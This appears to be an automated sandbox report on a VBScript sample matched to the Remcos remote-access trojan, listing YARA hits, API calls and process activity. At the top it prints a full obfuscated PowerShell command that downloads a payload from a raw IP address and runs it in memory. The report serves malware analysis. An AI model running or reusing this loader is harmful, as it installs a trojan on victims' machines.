                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess Stats: CPU usage > 49%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,15_2_004158B9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAC480FFA7_2_00007FFAAC480FFA
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAC55115D7_2_00007FFAAC55115D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0041D07115_2_0041D071
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_004520D215_2_004520D2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0043D09815_2_0043D098
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0043715015_2_00437150
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_004361AA15_2_004361AA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0042625415_2_00426254
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0043137715_2_00431377
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0043651C15_2_0043651C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0041E5DF15_2_0041E5DF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0044C73915_2_0044C739
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_004367C615_2_004367C6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_004267CB15_2_004267CB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0043C9DD15_2_0043C9DD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00432A4915_2_00432A49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00436A8D15_2_00436A8D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0043CC0C15_2_0043CC0C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00436D4815_2_00436D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00434D2215_2_00434D22
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00426E7315_2_00426E73
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00440E2015_2_00440E20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0043CE3B15_2_0043CE3B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00412F4515_2_00412F45
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00452F0015_2_00452F00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00426FAD15_2_00426FAD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00401F66 appears 50 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 004020E7 appears 40 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 004338A5 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00433FB0 appears 55 times
                  Source: sostener.vbsInitial sample: Strings found which are bigger than 50
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2984
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2984Jump to behavior
                  Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.powershell.exe.25f108182e0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                  Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 5896, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 7.2.powershell.exe.25f10962108.1.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                  Source: 7.2.powershell.exe.25f10962108.1.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
                  Source: 7.2.powershell.exe.25f28c70000.4.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                  Source: 7.2.powershell.exe.25f28c70000.4.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
                  Source: 7.2.powershell.exe.25f287f0000.3.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                  Source: 7.2.powershell.exe.25f287f0000.3.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
                  Source: 7.2.powershell.exe.25f108182e0.0.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                  Source: 7.2.powershell.exe.25f108182e0.0.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winVBS@14/11@5/6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,15_2_00416AB7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,15_2_0040E219
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,15_2_0041A63F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,15_2_00419BC4
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-0883UG
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huhpgnei.lkn.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: sostener.vbsReversingLabs: Detection: 21%
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
